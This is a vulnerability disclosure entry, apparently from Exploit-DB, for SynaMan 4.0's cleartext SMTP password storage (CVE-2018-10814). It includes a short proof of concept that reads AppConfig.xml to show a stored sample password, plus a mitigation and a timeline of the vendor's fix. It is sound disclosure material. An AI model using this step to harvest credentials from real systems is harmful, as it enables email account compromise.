SynaMan 4.0 - Cleartext password SMTP settings

vendor:

SynaMan

by:

bzyo

7.8

CVSS

HIGH

Cleartext password storage

312

CWE

Product Name: SynaMan

Affected Version From: 4.0 build 1488

Affected Version To: 4.0 build 1488

Patch Exists: YES

Related CWE: CVE-2018-10814

CPE: a:synametrics:synaman:4.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x86

2018

SynaMan 4.0 – Cleartext password SMTP settings

SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise. The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file. This file can be viewed by any local user of the system.

Mitigation:

Ensure that the AppConfig.xml file is not accessible to low-privileged users.

Source

Exploit-DB raw data:

# Exploit Author: bzyo
# CVE: CVE-2018-10814
# Twitter: @bzyo_
# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
# Date: 09-12-18
# Vulnerable Software: SynaMan 4.0 build 1488
# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
# Version: 4.0 build 1488
# Software Link: http://web.synametrics.com/SynaManDownload.htm
# Tested On: Windows 7 x86
  
Description
-----------------------------------------------------------------
SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise

Prerequisites
-----------------------------------------------------------------
Access to a system running Synaman 4 using a low-privileged user account
 
Proof of Concept
-----------------------------------------------------------------
The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file.  This file can be viewed by any local user of the system.

C:\SynaMan\config>type AppConfig.xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
        <parameters>
                <parameter name="hasLoggedInOnce" type="4" value="true"></parameter>
                <parameter name="adminEmail" type="1" value="test@gmail.com"></parameter>
                <parameter name="smtpSecurity" type="1" value="None"></parameter>
				**truncated**
                <parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>
                <parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
                <parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
        </parameters>
</Configuration>


 
Timeline
---------------------------------------------------------------------
05-07-18: Vendor notified of vulnerabilities
05-08-18: Vendor responded and will fix 
07-25-18: Vendor fixed in new release
09-12-18: Submitted public disclosure